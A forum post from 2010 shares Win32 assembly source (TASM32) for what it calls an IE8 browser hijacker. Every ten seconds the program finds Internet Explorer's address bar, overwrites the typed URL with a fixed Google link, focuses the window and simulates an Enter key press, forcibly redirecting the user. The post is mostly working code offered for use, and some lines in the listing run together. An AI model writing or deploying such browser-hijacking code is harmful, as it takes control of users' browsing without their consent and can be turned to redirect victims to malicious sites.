IE8 Browser Hijack

Posted July 26, 201015 yr

plenty of examples of an IE 8 hijacker on the net

heres one in tasm32

;tasm32 /ml hijak
;tlink32 -x -c -aa hijak,,,import32
.386P
Locals
jumps
.Model Flat ,StdCallinclude windows.incextrn FindWindowExA:PROC
extrn FindWindowA:PROC
extrn SendMessageA:PROC
extrn ExitProcess:PROC
extrn MessageBoxA:PROC
extrn SetForegroundWindow:PROC
extrn keybd_event:PROC
extrn Sleep:PROCVK_RETURN equ 0Dh
SW_SHOWNORMAL equ 1.data?
buff db ?.data
hwnd dd 0
ieclass db "IEFrame",0
ieworker db"WorkerW",0
ieadd db "Address Combo Control",0
ienav db "Navigation Bar",0
ierebar db "ReBarWindow32",0
iebar db "ToolBarWindow32",0
ieedit db "Edit",0
ieroot db"Address Band Root",0
addrs db "http://www.google.com/search?hl=en&source=hp&q=&btnI=I%27m+Feeling+Lucky&aq=f&aqi=&aql=&oq=&gs_rfai=",0.code
start:
loop:
call Sleep,10000push 0
push offset ieclass
call FindWindowAmov [hwnd],eaxpush 0
push offset ieworker
push 0
push hwnd
call FindWindowExA
mov [hwnd],eaxpush 0
push offset ierebar
push 0
push hwnd
call FindWindowExAmov [hwnd],eax
push 0
push offset ieroot
push 0
push hwnd
call FindWindowExAmov [hwnd],eaxpush 0
push offset ieedit
push 0
push hwnd
call FindWindowExAmov [hwnd],eaxpush offset buff
push 260
push WM_GETTEXT
push hwnd
call SendMessageA;push 0
;push 0
;push offset buff
;push 0
;call MessageBoxApush offset addrs
push 0
push WM_SETTEXT
push hwnd
call SendMessageApush SW_SHOWNORMAL
push [hwnd]
call SetForegroundWindowpush 0 
push 0
push 0
push VK_RETURN
call keybd_eventjmp loop
call ExitProcess
end start

Edited December 15, 201014 yr by JMC31337

Sign In

IE8 Browser Hijack

Featured Replies

Create an account or sign in to comment

Account

Navigation

Search

Configure browser push notifications

Chrome (Android)

Chrome (Desktop)

Safari (iOS 16.4+)

Safari (macOS)

Edge (Android)

Edge (Desktop)

Firefox (Android)

Firefox (Desktop)